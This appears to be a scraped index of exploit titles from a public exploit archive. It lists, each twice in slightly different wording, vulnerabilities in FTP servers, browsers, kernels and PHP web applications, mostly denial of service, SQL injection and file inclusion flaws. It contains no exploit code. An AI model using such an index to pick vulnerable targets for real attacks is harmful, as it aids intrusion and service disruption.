FTP server 6.26 build 630 - Remote Denial of Service Exploit Titan FTP server 6.26 build 630 - Remote Denial of Service Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS Exploit Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote Denial of Service Dart Communications PowerTCP FTP module Remote BoF Exploit Dart Communications PowerTCP FTP module - Remote BoF Exploit SilverSHielD 1.0.2.34 - (opendir) Denial of Service Exploit SilverSHielD 1.0.2.34 - (opendir) Denial of Service vicFTP 5.0 - (LIST) Remote Denial of Service Exploit vicFTP 5.0 - (LIST) Remote Denial of Service PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (Metasploit) PumpKIN TFTP Server 2.7.2.0 - Denial of Service (Metasploit) PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Exploit PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Bloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling ExoPHPDesk 1.2 Final (Auth Bypass) SQL Injection ExoPHPDesk 1.2 Final - (Auth Bypass) SQL Injection Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service Exploit Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password Exploit Microsoft Office Communicator (SIP) Remote Denial of Service Exploit Microsoft Office Communicator (SIP) Remote Denial of Service OpenForum 0.66 Beta Remote Reset Admin Password Exploit OpenForum 0.66 Beta - Remote Reset Admin Password Exploit Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service Exploit Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local DoS Exploit Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service Exploit Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service Linksys Wireless ADSL Router (WAG54G v2) - httpd DoS Exploit 
Linksys Wireless ADSL Router (WAG54G v2) - httpd Denial of Service Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin) PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service Exploit Psi Jabber Client (8010/tcp) Remote Denial of Service (win/lin) PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service VMware 2.5.1 - (Vmware-authd) Remote Denial of Service Exploit VMware 2.5.1 - (Vmware-authd) Remote Denial of Service SeaMonkey 1.1.14 - (marquee) Denial of Service Exploit SeaMonkey 1.1.14 - (marquee) Denial of Service Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Winamp 5.541 - (mp3/aiff) Multiple Denial of Service Exploits Winamp 5.541 - (mp3/aiff) Multiple Denial of Services Cisco VLAN Trunking Protocol Denial of Service Exploit Cisco VLAN Trunking Protocol Denial of Service Novell Netware 6.5 - (ICEbrowser) Remote System DoS Exploit Novell Netware 6.5 - (ICEbrowser) Remote System Denial of Service D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service Exploit D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service TxtBlog 1.0 Alpha Remote Command Execution Exploit TxtBlog 1.0 Alpha - Remote Command Execution Exploit GR Note 0.94 beta (Auth Bypass) Remote Database Backup GR Note 0.94 beta - (Auth Bypass) Remote Database Backup Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service BlueBird Pre-Release (Auth Bypass) SQL Injection BlueBird Pre-Release - (Auth Bypass) SQL Injection Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit Got All Media 7.0.0.3 - (t00t) Remote Denial of Service HTC Touch vCard over IP Denial of Service Exploit HTC Touch vCard over IP Denial of Service Yaws < 1.80 - (multiple headers) Remote Denial of Service Exploit Yaws < 1.80 - (multiple headers) Remote Denial of Service Multiple Vendors libc:fts_*() - Local Denial of Service Exploit 
Multiple Vendors libc:fts_*() - Local Denial of Service Addonics NAS Adapter Post-Auth Denial of Service Exploit Addonics NAS Adapter Post-Auth Denial of Service Serv-U 7.4.0.1 - (SMNT) Denial of Service Exploit (post auth) VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit Serv-U 7.4.0.1 - (SMNT) Denial of Service (post auth) VLC 0.9.8a Web UI (input) Remote Denial of Service SW-HTTPD Server 0.x - Remote Denial of Service Exploit SW-HTTPD Server 0.x - Remote Denial of Service XM Easy Personal FTP Server 5.7.0 - (NLST) DoS Exploit XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service Sami HTTP Server 2.x - (HEAD) Remote Denial of Service Exploit Sami HTTP Server 2.x - (HEAD) Remote Denial of Service IBM DB2 < 9.5 pack 3a - Connect Denial of Service Exploit IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service Exploit IBM DB2 < 9.5 pack 3a - Connect Denial of Service IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service Steamcast 0.9.75b Remote Denial of Service Exploit OpenBSD 4.5 IP datagram Null Pointer Deref DoS Exploit Steamcast 0.9.75b Remote Denial of Service OpenBSD 4.5 IP datagram Null Pointer Deref Denial of Service Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit Microsoft Media Player - (quartz.dll .mid) Denial of Service Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth) Addonics NAS Adapter (bts.cgi) Remote Denial of Service (post-auth) Zervit Web Server 0.3 - Remote Denial of Service Exploit Zervit Web Server 0.3 - Remote Denial of Service Xitami Web Server 5.0 - Remote Denial of Service Exploit Xitami Web Server 5.0 - Remote Denial of Service iodined 0.4.2-2 - (forged DNS packet) Denial of Service Exploit iodined 0.4.2-2 - (forged DNS packet) Denial of Service Addonics NAS Adapter FTP Remote Denial of Service Exploit Addonics NAS Adapter FTP Remote Denial of Service Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet Denial of Service TYPSoft 
FTP Server 1.11 - (ABORT) Remote DoS Exploit TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service Mereo 1.8.0 - (Get Request) Remote Denial of Service Exploit Mereo 1.8.0 - (Get Request) Remote Denial of Service DGNews 3.0 Beta (id) SQL Injection DGNews 3.0 Beta - (id) SQL Injection Mozilla Firefox (unclamped loop) Denial of Service Exploit Mozilla Firefox (unclamped loop) Denial of Service Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service Exploit Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service Apache mod_dav / svn Remote Denial of Service Exploit Apache mod_dav / svn Remote Denial of Service OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote Denial of Service LinkLogger 2.4.10.15 - (syslog) Denial of Service Exploit LinkLogger 2.4.10.15 - (syslog) Denial of Service ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit ARD-9808 DVR Card Security Camera (GET Request) Remote Denial of Service FreeBSD 6/8 - (ata device) Local Denial of Service Exploit FreeBSD 6/8 - (ata device) Local Denial of Service Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all) Multiple Web Browsers Denial of Service (1 bug to rule them all) FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit FreeBSD 7.2 - (pecoff executable) Local Denial of Service E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection OpenH323 Opal SIP Protocol Remote Denial of Service Exploit Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit WzdFTPD 8.0 - Remote Denial of Service Exploit OpenH323 Opal SIP Protocol Remote Denial of Service Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service WzdFTPD 8.0 - Remote Denial of Service FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Exploit FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Linux Kernel < 2.6.30.5 cfg80211 - Remote Denial of Service Exploit Linux Kernel 
< 2.6.30.5 cfg80211 - Remote Denial of Service TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit TheGreenBow VPN Client tgbvpn.sys Local Denial of Service HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service KSP 2006 FINAL (.M3U) Universal Local Buffer Exploit (SEH) KSP 2006 FINAL - (.M3U) Universal Local Buffer Exploit (SEH) Xerox WorkCentre Multiple Models Denial of Service Exploit Cerberus FTP 3.0.1 - (ALLO) Remote Overflow DoS Exploit (Metasploit) Xerox WorkCentre Multiple Models Denial of Service Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit) TFTPUtil GUI 1.3.0 - Remote Denial of Service Exploit TFTPUtil GUI 1.3.0 - Remote Denial of Service SolarWinds TFTP Server 9.2.0.111 - Remote DoS Exploit SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service Re-Script 0.99 Beta (listings.php op) SQL Injection Re-Script 0.99 Beta - (listings.php op) SQL Injection Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit Novell eDirectory 8.8 SP5 - Remote Denial of Service Safari 3.2.3 - (Win32) JavaScript (eval) Remote DoS Exploit Safari 3.2.3 - (Win32) JavaScript (eval) Remote Denial of Service WarFTPd 1.82.00-RC12 - (LIST command) Format String DoS Exploit WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit FreeRadius < 1.1.8 - Zero-length Tunnel-Password Denial of Service httpdx Web Server 1.4 - (Host Header) Remote Format String DoS Exploit httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service FtpXQ FTP Server 3.0 - Remote Denial of Service Exploit (Auth) FtpXQ FTP Server 3.0 - Remote Denial of Service (Auth) Cerberus FTP Server 3.0.3 - Remote Denial of Service Exploit Cerberus FTP Server 3.0.3 - Remote Denial of Service FTPDMIN 0.96 - (LIST) Remote Denial of Service Exploit FTPDMIN 0.96 - (LIST) Remote Denial of Service Safari 4.0.3 - (Win32) CSS 
Remote Denial of Service Exploit Safari 4.0.3 - (Win32) CSS Remote Denial of Service PHP < 5.3.1 - 'multipart/form-data' Denial of Service Exploit (Python) PHP < 5.3.1 - 'multipart/form-data' Denial of Service (Python) Drupal Sections Module XSS Drupal Sections Module - XSS 3Com OfficeConnect Routers - Remote DoS Exploit 3Com OfficeConnect Routers - Remote Denial of Service TFTP Daemon 1.9 - Denial of Service Exploit TFTP Daemon 1.9 - Denial of Service SimplePlayer 0.2 - (.wav) Overflow DoS Exploit (0Day) SimplePlayer 0.2 - (.wav) Overflow Denial of Service (0Day) Joomla Component com_abbrev Local File Inclusion Joomla Component com_abbrev - Local File Inclusion iOS Udisk FTP Basic Edition - Remote DoS Exploit (0Day) iOS Udisk FTP Basic Edition - Remote Denial of Service (0Day) P2GChinchilla HTTP Server 1.1.1 - Denial of Service Exploit P2GChinchilla HTTP Server 1.1.1 - Denial of Service iOS Serversman 3.1.5 - HTTP Remote DoS Exploit iOS Serversman 3.1.5 - HTTP Remote Denial of Service Opera 10.10 - Remote Code Execution DoS Exploit Opera 10.10 - Remote Code Execution Denial of Service Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service Exploit Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service Exploit Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service iOS My DBLite Edition - Remote DoS Exploit (0Day) iOS My DBLite Edition - Remote Denial of Service (0Day) iOS FileApp 1.7 - Remote DoS Exploit iOS FileApp 1.7 - Remote Denial of Service iOS iFTPStorage 1.2 - Remote DoS Exploit iOS iFTPStorage 1.2 - Remote Denial of Service Winamp 5.57 - (Browser) IE Denial of Service Exploit Winamp 5.57 - (Browser) IE Denial of Service VKPlayer 1.0 - (.mid) Denial of Service Exploit VKPlayer 1.0 - (.mid) Denial of Service iPhone FTP Server By Zhang Boyang Remote DoS Exploit iPhone FTP Server By Zhang Boyang Remote Denial of Service Mozilla Firefox 3.6 - Denial of 
Service Exploit Mozilla Firefox 3.6 - Denial of Service Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote Include Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion PowieSys 0.7.7 alpha index.php (shownews) SQL Injection PowieSys 0.7.7 alpha - index.php (shownews) SQL Injection BitComet 1.19 - Remote DoS Exploit BitComet 1.19 - Remote Denial of Service ALPHA CMS Local File Inclusion ALPHA CMS - Local File Inclusion uTorrent WebUI 0.370 - Authorization header DoS Exploit uTorrent WebUI 0.370 - Authorization header Denial of Service Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit Foxit Reader 3.2.1.0401 - Denial of Service Exploit Microsoft Office (2010 beta) Communicator SIP Denial of Service Foxit Reader 3.2.1.0401 - Denial of Service Joomla Component JTM Reseller 1.9 Beta SQL Injection Joomla Component JTM Reseller 1.9 Beta - SQL Injection EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote DoS Exploit (IE) EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE) Webmoney Advisor ActiveX Remote DoS Exploit Webmoney Advisor ActiveX Remote Denial of Service Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Press Release Script (page.php id) SQL Injection Press Release Script - (page.php id) SQL Injection dotWidget for articles 2.0 admin/editconfig.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/editconfig.php Multiple Parameter Remote File Inclusion HomeFTP Server r1.10.3 - (build 144) Denial of Service Exploit HomeFTP Server r1.10.3 - (build 144) Denial of Service Solarwinds 10.4.0.13 - Denial of Service Exploit Solarwinds 10.4.0.13 - Denial of Service EZPX Photoblog 1.2 beta Remote File Inclusion Exploit EZPX Photoblog 1.2 beta - Remote File Inclusion Exploit Drupal Sections 5.x-1.2/6.x-1.2 Module HTML Injection Drupal Sections 5.x-1.2/6.x-1.2 Module - HTML Injection MP3 
Cutter 1.5 - DoS Exploit MP3 Cutter 1.5 - Denial of Service Really Simple IM 1.3beta DoS Proof of Concept Really Simple IM 1.3beta - DoS Proof of Concept QQ Computer Manager TSKsp.sys Local Denial of Service Exploit QQ Computer Manager TSKsp.sys Local Denial of Service SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) DoS Exploit SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) Denial of Service VMware Workstation 7.1.1 - VMkbd.sys Denial of Service Exploit VMware Workstation 7.1.1 - VMkbd.sys Denial of Service iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit iOS FileApp < 2.0 - FTP Remote Denial of Service AVG Internet Security 9.0.851 - Local Denial of Service Exploit AVG Internet Security 9.0.851 - Local Denial of Service GSPlayer 1.83a Win32 Release Buffer Overflow GSPlayer 1.83a Win32 Release - Buffer Overflow Sami HTTP Server 2.0.1 - GET Request Denial of Service Exploit Sami HTTP Server 2.0.1 - GET Request Denial of Service PCSX2 0.9.7 beta Binary Denial of Service PCSX2 0.9.7 beta - Binary Denial of Service HttpBlitz Web Server Denial of Service Exploit HttpBlitz Web Server Denial of Service Xynph 1.0 USER Denial of Service Exploit Xynph 1.0 USER Denial of Service Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys 2011.1.13.89 - Local Kernel Mode DoS Exploit Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys 2011.1.13.89 - Local Kernel Mode Denial of Service Solar FTP 2.1 - Denial of Service Exploit Solar FTP 2.1 - Denial of Service Victory FTP Server 5.0 - Denial of Service Exploit Victory FTP Server 5.0 - Denial of Service TWiki History TWikiUsers rev Parameter Command Execution TWiki History TWikiUsers - rev Parameter Command Execution AVIPreview 0.26 Alpha Denial of Service AVIPreview 0.26 Alpha - Denial of Service Microsoft Windows XP - afd.sys Local Kernel DoS Exploit Microsoft Windows XP - afd.sys Local Kernel Denial of Service Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel DoS Exploit Microsoft Windows 
Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service Adobe Reader/Acrobat 10.0.1 DoS Exploit Adobe Reader/Acrobat 10.0.1 Denial of Service Omnicom Alpha 4.0e LPD Server DoS Omnicom Alpha 4.0e LPD Server - DoS OpenSLP 1.2.1 / < 1647 trunk - Denial of Service Exploit OpenSLP 1.2.1 / < 1647 trunk - Denial of Service World Of Warcraft Local Stack Overflow DoS Exploit (chat-cache.txt) World Of Warcraft Local Stack Overflow Denial of Service (chat-cache.txt) TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption) TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file corruption) 1024 CMS 1.1.0 Beta force_download.php Local File Inclusion 1024 CMS 1.1.0 Beta - force_download.php Local File Inclusion FleaHttpd Remote Denial of Service Exploit FleaHttpd Remote Denial of Service ComSndFTP Server 1.3.7 Beta Remote Format String Overflow ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow Play [EX] 2.1 - Playlist File (M3U/PLS/LST) DoS Exploit Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service Windows OpenType Font - File Format DoS Exploit Windows OpenType Font - File Format Denial of Service HP JetAdmin 1.0.9 Rev. D symlink HP JetAdmin 1.0.9 Rev. 
D - symlink Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information Daniel Beckham The Finger Server 0.82 BETA Pipe Daniel Beckham The Finger Server 0.82 BETA - Pipe Sambar Server 4.2 beta 7 Batch CGI Sambar Server 4.2 beta 7 - Batch CGI DomsHttpd 1.0 - Remote Denial of Service Exploit DomsHttpd 1.0 - Remote Denial of Service Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (1) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (2) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (3) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha DNS Decode (1) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha DNS Decode (2) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha - DNS Decode (1) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha - DNS Decode (2) Real Networks Real Server 7.0/7.0.1/8.0 Beta View-Source DoS Real Networks Real Server 7.0/7.0.1/8.0 Beta - View-Source DoS Omnicron OmniHTTPD 1.1/2.0 Alpha 1 visiadmin.exe Denial of Service Omnicron OmniHTTPD 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service Sun Java Web Server 1.1 Beta Viewable .jhtml Source Sun Java Web Server 1.1 Beta - Viewable .jhtml Source HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification HP JetDirect rev. G.08.x/rev. 
H.08.x/x.08.x/J3111A - LCD Display Modification Sambar Server 4.1 beta Admin Access Sambar Server 4.1 beta - Admin Access Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure Cisco IOS 12 UDP Denial of Service Cisco IOS 12 - UDP Denial of Service XMB Forum 1.6 pre-beta Image Tag Script Injection XMB Forum 1.6 pre-beta - Image Tag Script Injection DCShop Beta 1.0 Form Manipulation DCShop Beta 1.0 - Form Manipulation Cisco IOS 11.x/12.0 ICMP Redirect Denial of Service Cisco IOS 11.x/12.0 - ICMP Redirect Denial of Service SmartMail Server 1.0 BETA 10 Oversized Request Denial of Service SmartMail Server 1.0 BETA 10 - Oversized Request Denial of Service Ultimate PHP Board 1.0 final beta ViewTopic.php Directory Contents Browsing Ultimate PHP Board Board 1.0 final beta ViewTopic.php Cross-Site Scripting Ultimate PHP Board 1.0 final beta - ViewTopic.php Directory Contents Browsing Ultimate PHP Board Board 1.0 final beta - ViewTopic.php Cross-Site Scripting N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI N/X Web Content Management System 2002 Prerelease 1 - datasets.php c_path Parameter LFI PHPOutsourcing Zorum 3.x - Remote Include Command Execution PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution Sage 1.0 beta 3 Content Management System Path Disclosure Sage 1.0 beta 3 Content Management System Cross-Site Scripting Sage 1.0 beta 3 - Content Management System Path Disclosure Sage 1.0 beta 3 - Content Management System Cross-Site Scripting E-theni Remote Include Command Execution E-theni Remote File Inclusion Command Execution BZFlag 1.7 g0 Reconnect Denial of Service BZFlag 1.7 g0 - Reconnect Denial of Service Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module Integer Overflow Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module - Integer Overflow PMachine 2.2.1 Lib.Inc.php Remote Include Command 
Execution PMachine 2.2.1 Lib.Inc.php Remote File Inclusion Command Execution PHPForum 2.0 RC1 Mainfile.php Remote File Inclusion PHPForum 2.0 RC1 - Mainfile.php Remote File Inclusion IdealBB 1.4.9 Beta HTML Injection IdealBB 1.4.9 Beta - HTML Injection Escapade 0.2.1 Beta Scripting Engine PAGE Parameter Cross-Site Scripting Escapade 0.2.1 Beta Scripting Engine PAGE Parameter Path Disclosure Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Cross-Site Scripting Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Path Disclosure Koch Roland Rolis Guestbook 1.0 $path Remote File Inclusion Koch Roland Rolis Guestbook 1.0 - $path Remote File Inclusion My_EGallery Module 3.1.1 - Remote Include Command Injection My_EGallery Module 3.1.1 - Remote File Inclusion Command Injection Apache 2.0.4x mod_php Module File Descriptor Leakage (1) Apache 2.0.4x mod_php Module File Descriptor Leakage (2) Apache 2.0.4x mod_php Module - File Descriptor Leakage (1) Apache 2.0.4x mod_php Module - File Descriptor Leakage (2) Apache 2.0.4x mod_perl Module File Descriptor Leakage Apache 2.0.4x mod_perl Module - File Descriptor Leakage Laurent Adda Les Commentaires 2.0 PHP Script fonctions.lib.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 PHP Script derniers_commentaires.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 PHP Script admin.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion NewsTraXor Website Management Script 2.9 beta Database Disclosure NewsTraXor Website Management Script 2.9 beta - Database Disclosure Adam Webb NukeJokes 1.7/2.0 Module modules.php jokeid Parameter SQL Injection Adam Webb NukeJokes 1.7/2.0 Module - modules.php jokeid Parameter SQL Injection PHP 4/5 Input/Output Wrapper Remote Include Function Command 
Execution Weakness PHP 4/5 Input/Output Wrapper Remote File Inclusion Function Command Execution Weakness Sambar Server 6.1 beta 2 show.asp show Parameter XSS Sambar Server 6.1 beta 2 showperf.asp title Parameter XSS Sambar Server 6.1 beta 2 showini.asp Arbitrary File Access Sambar Server 6.1 beta 2 - show.asp show Parameter XSS Sambar Server 6.1 beta 2 - showperf.asp title Parameter XSS Sambar Server 6.1 beta 2 - showini.asp Arbitrary File Access EasyWeb 1.0 FileManager Module Directory Traversal EasyWeb 1.0 FileManager Module - Directory Traversal EasyIns Stadtportal 4.0 Site Parameter Remote File Inclusion EasyIns Stadtportal 4.0 - Site Parameter Remote File Inclusion Free Web Chat Initial Release UserManager.java Null Pointer DoS Free Web Chat Initial Release Connection Saturation DoS Free Web Chat Initial Release - UserManager.java Null Pointer DoS Free Web Chat Initial Release - Connection Saturation DoS Cerulean Studios Trillian Client 0.74 MSN Module Remote Buffer Overflow Cerulean Studios Trillian Client 0.74 MSN Module - Remote Buffer Overflow TP-Link TL-WR740N Wireless Router - Denial of Service Exploit TP-Link TL-WR740N Wireless Router - Denial of Service Singapore 0.9.11 beta Image Gallery Index.php Cross-Site Scripting Singapore 0.9.11 beta Image Gallery - Index.php Cross-Site Scripting Datenbank Module For PHPBB Remote Mod.php Cross-Site Scripting Datenbank Module For PHPBB - Remote Mod.php Cross-Site Scripting Convert-UUlib 1.04/1.05 Perl Module Buffer Overflow Convert-UUlib 1.04/1.05 Perl Module - Buffer Overflow Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.php Remote File Inclusion Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion Comdev ECommerce 3.0 Config.php Remote File Inclusion Comdev ECommerce 3.0 - Config.php Remote File Inclusion PHPTB Topic Board 2.0 admin_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 board_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 
dev_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 file_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 tech_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - admin_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - board_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - dev_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - file_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - tech_o.php absolutepath Parameter Remote File Inclusion PHPWebNotes 2.0 Api.php Remote File Inclusion PHPWebNotes 2.0 - Api.php Remote File Inclusion CMS Made Simple 0.10 Lang.php Remote File Inclusion CMS Made Simple 0.10 - Lang.php Remote File Inclusion MusicBee 2.0.4663 - (.m3u) Denial of Service Exploit MusicBee 2.0.4663 - (.m3u) Denial of Service Help Center Live 1.0/1.2/2.0 Module.php Local File Inclusion Help Center Live 1.0/1.2/2.0 - Module.php Local File Inclusion Edgewall Software Trac 0.9 Ticket Query Module SQL Injection Edgewall Software Trac 0.9 Ticket Query Module - SQL Injection Thwboard Beta 2.8 calendar.php year Parameter SQL Injection Thwboard Beta 2.8 v_profile.php user Parameter SQL Injection Thwboard Beta 2.8 misc.php userid Parameter SQL Injection Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection Bitweaver 1.1.1 beta list_galleries.php sort_mode Parameter XSS Bitweaver 1.1.1 beta - list_galleries.php sort_mode Parameter XSS OABoard 1.0 Forum Script Remote File Inclusion OABoard 1.0 Forum - Script Remote File Inclusion InTouch 0.5.1 Alpha User Variable SQL Injection InTouch 0.5.1 Alpha - User Variable SQL Injection LinPHA 0.9.x/1.0 install.php language Parameter Local File Inclusion LinPHA 0.9.x/1.0 sec_stage_install.php language Parameter Local File Inclusion 
LinPHA 0.9.x/1.0 forth_stage_install.php language Variable POST Method Local File Inclusion LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion Dotproject 2.0 /includes/db_connect.php baseDir Remote File Inclusion Dotproject 2.0 /includes/session.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion Dotproject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/public/calendar.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/public/date_format.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion Web Host Automation Ltd. Helm 3.2.10 beta domains.asp txtDomainName Parameter XSS Web Host Automation Ltd. Helm 3.2.10 beta default.asp Multiple Parameter XSS Web Host Automation Ltd. Helm 3.2.10 beta - domains.asp txtDomainName Parameter XSS Web Host Automation Ltd. 
